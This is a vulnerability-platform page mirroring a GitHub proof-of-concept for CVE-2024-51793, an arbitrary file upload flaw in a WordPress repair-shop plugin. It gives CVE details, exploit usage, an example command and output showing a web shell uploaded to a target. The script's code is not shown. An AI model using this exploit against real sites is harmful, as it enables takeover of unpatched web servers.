漏洞平台

POC详情： ea61507d99b82a3e2defe988667a44c4cfcabfbe

来源

https://github.com/Nxploited/CVE-2024-51793

关联漏洞

标题： WordPress plugin Computer Repair Shop 代码问题漏洞 (CVE-2024-51793)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Computer Repair Shop 3.8115版本及之前版本存在代码问题漏洞，该漏洞源于包含一个危险类型文件上传不受限制漏洞。

描述

 WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability

介绍

# 🛡️ WordPress RepairBuddy Plugin Exploit

## 📜 CVE Information

**CVE-ID:** CVE-2024-51793  
**Published:** 2024-11-11  
**Updated:** 2024-11-11  
**Title:** WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability  
**Description:**  
Unrestricted Upload of File with Dangerous Type vulnerability in Webful Creations Computer Repair Shop allows Upload a Web Shell to a Web Server. This issue affects Computer Repair Shop: from n/a through 3.8115.

**CWE:**  
- [CWE-434: Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)

**CVSS:**  
- **Score:** 10.0 (CRITICAL)
- **Version:** 3.1
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

## 📋 Description

This is a proof of concept exploit for the Arbitrary File Upload vulnerability in the WordPress RepairBuddy plugin versions <= 3.8115. The exploit allows an attacker to upload a web shell to the vulnerable server.

## ⚙️ Requirements

- Python 3.x
- `requests` library (`pip install requests`)

## 🚀 Usage

```shell
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload
```

## 📖 Example

```shell
python 
CVE-2024-51793.py -u http://target.com/wordpress
```

## 📝 Output

```text
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><img src=\"http:\/\/target\/wordpress\/wp-content\/plugins\/computer-repair-shop\/assets\/images\/attachment.png\" class=\"\" \/><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
```

## 👨‍💻 Author

Exploit By: Nxploited, Khaled Alenazi

文件快照


 [4.0K]  /data/pocs/ea61507d99b82a3e2defe988667a44c4cfcabfbe
├── [4.9K]  CVE-2024-51793.py
└── [2.2K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。